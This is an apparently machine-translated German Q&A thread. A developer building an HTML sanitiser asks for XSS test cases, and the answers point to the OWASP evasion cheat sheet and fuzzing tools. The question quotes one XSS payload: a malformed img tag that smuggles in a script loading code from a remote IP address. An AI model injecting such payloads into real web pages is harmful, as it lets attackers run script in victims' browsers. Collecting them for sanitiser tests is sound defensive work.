XSS Torture Test - gibt es sie?
-
05-07-2019 - |
Frage
Ich suche eine html sanitiser zu schreiben, und offensichtlich zu testen / beweisen, dass es richtig funktioniert, habe ich eine Reihe von XSS Beispiele müssen dagegen, um die Tonhöhe zu sehen, wie er ausführt. Hier ist ein von Coding Horror
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
Ich weiß, es gibt eine Mime Torture Test die verschachtelte von mehreren umfasst E-Mails mit Anhängen, die Mime-Decoder zu testen verwendet wird (wenn sie es richtig entschlüsseln können, dann arbeiten sie bewiesen haben). Ich bin im Grunde für eine equivilent für XSS suchen, das heißt, eine Liste von Beispielen von zwielichtigen html, die ich gerade an meinem sanitiser werfen kann, um sicherzustellen, dass es funktioniert OK.
Wenn jemand auch keine gute Ressourcen, wie die sanitiser schreiben (das heißt, welche gemeinsamen Exploits Menschen versuchen, zu verwenden, usw.) sie dankbar zu empfangen werden würde.
Vielen Dank im Voraus: -)
Edit: Sorry, wenn dies vorher nicht klar war, aber ich war nach einer Reihe von Folter Tests, damit ich Unit-Tests für die sanitiser schreiben kann, nicht im Browser testen, usw. Die Quelldaten in der Theorie haben kommen von überall -. nicht nur einen Browser
Lösung
Werfen Sie einen Blick auf diese XSS Cheat-Liste: https://www.owasp.org/ index.php / XSS_Filter_Evasion_Cheat_Sheet
Andere Tipps
XSS Me eine große Firefox-Plugin ist, dass Sie gegen ausführen können Ihre sanitizer.
Sie könnten Jesse Ruderman des jsfunfuzz versuchen ( http: //www.squarefree .com / 2007/08/02 / Einführung-jsfunfuzz / ), die Zufallsdaten in Ihrem Javascript wirft versuchen, es zu brechen. Es scheint, das Firefox-Team dies mit großem Erfolg eingesetzt hat.